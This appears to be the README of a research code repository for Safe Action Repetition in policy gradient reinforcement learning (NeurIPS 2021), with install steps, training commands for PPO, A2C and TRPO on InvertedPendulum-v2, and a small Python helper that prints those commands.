Time Discretization-Invariant Safe Action Repetition for Policy Gradient Methods

This repository is the official implementation of

  • Seohong Park, Jaekyeom Kim, Gunhee Kim. Time Discretization-Invariant Safe Action Repetition for Policy Gradient Methods. In NeurIPS, 2021.

It contains implementations of SAR, FiGAR-C, and the base policy gradient algorithms (PPO, TRPO, and A2C).

The code is based on Stable Baselines3 (SB3) for PPO and A2C, and Stable Baselines (SB) for TRPO.

Requirements and run examples

PPO and A2C (based on Stable Baselines3)

To install requirements:

cd sb3
pip install -r requirements.txt
pip install -e .

Train SAR-PPO on InvertedPendulum-v2 with δ = 0.01:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.01 --max_t=0.05 --max_d=0.5

Train FiGAR-C-PPO on InvertedPendulum-v2 with δ = 0.01:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.01 --max_t=0.05

Train PPO on InvertedPendulum-v2 with the original δ:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg

Train SAR-A2C on InvertedPendulum-v2 with δ = 0.01:

python repeat/main.py --env=InvertedPendulum-v2 --algo=a2c_rg --frame_skip=1 --dt=0.01 --max_t=0.05 --max_d=0.5

Train SAR-PPO on InvertedPendulum-v2 with δ = 0.002 and the "Action Noise" setting:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.002 --max_t=0.05 --max_d=0.5 --anoise_type=action --anoise_prob=0.05 --anoise_std=3

Train SAR-PPO on InvertedPendulum-v2 with δ = 0.002 and the "External Force" setting:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.002 --max_t=0.05 --max_d=0.5 --anoise_type=ext_f --anoise_prob=0.05 --anoise_std=300

Train SAR-PPO on InvertedPendulum-v2 with δ = 0.002 and the "Strong External Force (Perceptible)" setting:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.002 --max_t=0.05 --max_d=0.5 --anoise_type=ext_fpc --anoise_prob=0.05 --anoise_std=1000
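The commands above differ only in a handful of flags, so a small helper can assemble them when running several settings in a row. The following is a minimal sketch, not part of the repository: `BASE_ARGS`, `build_command`, and the sweep over two δ values are hypothetical names and choices made for illustration, and the flag values are copied from the SAR-PPO example above. It only prints the commands and does not launch any training.

```python
import shlex

# Flag values copied from the SAR-PPO example command above.
BASE_ARGS = {
    "env": "InvertedPendulum-v2",
    "algo": "ppo_rg",
    "frame_skip": "1",
    "max_t": "0.05",
    "max_d": "0.5",
}


def build_command(dt, **overrides):
    """Return the argv list for one repeat/main.py run with time step `dt`.

    Hypothetical helper: `overrides` replaces or adds flags, e.g. algo="a2c_rg".
    """
    args = {**BASE_ARGS, "dt": str(dt), **overrides}
    return ["python", "repeat/main.py"] + [f"--{k}={v}" for k, v in args.items()]


# Illustrative sweep over the two δ values that appear in the examples above.
commands = [build_command(dt) for dt in ("0.01", "0.002")]

for cmd in commands:
    # Print only. To launch a run, pass `cmd` to subprocess.run(cmd, check=True)
    # from inside the sb3 directory.
    print(shlex.join(cmd))
```

Passing `algo="a2c_rg"` to `build_command` yields the corresponding SAR-A2C command, and the noise settings can be added the same way (for example `anoise_type="action"`).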

TRPO (based on Stable Baselines)

To install requirements:

cd sb
pip install -r requirements.txt
pip install -e .

Train SAR-TRPO on InvertedPendulum-v2 with δ = 0.01:

python repeat/main.py --env=InvertedPendulum-v2 --frame_skip=1 --dt=0.01 --max_t=0.05 --max_d=0.5

License

This codebase is licensed under the MIT License. See also sb3/LICENSE_SB3 and sb/LICENSE_SB.
